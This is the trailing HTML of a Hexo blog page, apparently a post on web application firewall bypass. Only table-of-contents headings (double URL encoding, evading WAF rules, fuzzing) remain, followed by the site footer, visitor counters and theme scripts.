href="#%E5%8F%8C%E9%87%8DURL%E7%BC%96%E7%A0%81"><span class="nav-number">6.4.</span> <span class="nav-text">双重URL编码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BFWAF%E6%9C%AA%E6%A3%80%E6%B5%8B%E5%88%B0%E5%AF%B9%E5%BA%94%E7%9A%84%E8%A7%84%E5%88%99"><span class="nav-number">6.5.</span> <span class="nav-text">使WAF未检测到对应的规则</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#FUZZ%E5%A4%A7%E6%B3%95%E5%A5%BD%E5%95%8A"><span class="nav-number">7.</span> <span class="nav-text">FUZZ大法好啊</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#The-Sword-of-Damocles"><span class="nav-number">8.</span> <span class="nav-text">The Sword of Damocles</span></a></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>



        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">IcMl0x24</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        VISITOR COUNT&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        TOTAL PAGE VIEWS&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br> 
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v1.2.1</a>
        </div>
        
        
        
            <div id="start_time_div" style="display:none">
                2022/8/17 11:45:14
            </div>
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="unfolded-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="folded-tools-list">
        <li class="right-bottom-tools tool-toggle-show flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/menu-shrink.js"></script>

<script src="/js/tools/go-top-bottom.js"></script>

<script src="/js/tools/dark-light-toggle.js"></script>





    
<script src="/js/tools/code-block.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">









<div class="post-scripts pjax">
    
        
<script src="/js/tools/toc-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            REDEFINE.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            REDEFINE.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            REDEFINE.refresh();
        });
    });
</script>




</body>
</html>
